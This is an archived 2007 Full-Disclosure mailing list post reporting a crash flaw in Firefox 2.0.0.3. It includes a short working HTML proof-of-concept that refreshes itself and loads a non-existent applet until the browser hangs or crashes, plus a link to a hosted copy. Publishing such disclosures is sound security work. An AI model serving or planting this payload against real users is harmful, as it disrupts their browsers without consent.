[Full-disclosure] Firefox 2.0.0.3 non-existent applet DoS flaw
- From: "carl hardwick" <hardwick.carl@xxxxxxxxx>
- Date: Mon, 30 Apr 2007 17:35:58 +0200
Firefox 2.0.0.3 is unable to handle a multiple request of non-existent
applet so, after some page refresh, crashes or stops to answer.
You can try this exploit here www.shinnai.altervista.org/nea.html but,
if so, you need a little patience 'cause it's too slow than from local
exploitation.
<html>
<head>
<meta http-equiv='Refresh' content='0;url=nea.html'>
<applet name='$$$$$$$$$$$$' code='$$$$$$$$$$$$'
archive='$$$$$$$$$$$$' width='160' height='160'>
</applet>
</meta>
</head>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: Re: [Full-disclosure] Cryptome is dead (at least for now)
- Next by Date: [Full-disclosure] Aventail Connect SSL VPN Client Buffer Overflow
- Previous by thread: [Full-disclosure] [SECURITY] [DSA 1283-1] New php5 packages fix several vulnerabilities
- Next by thread: [Full-disclosure] Aventail Connect SSL VPN Client Buffer Overflow
- Index(es):
Relevant Pages
|
|
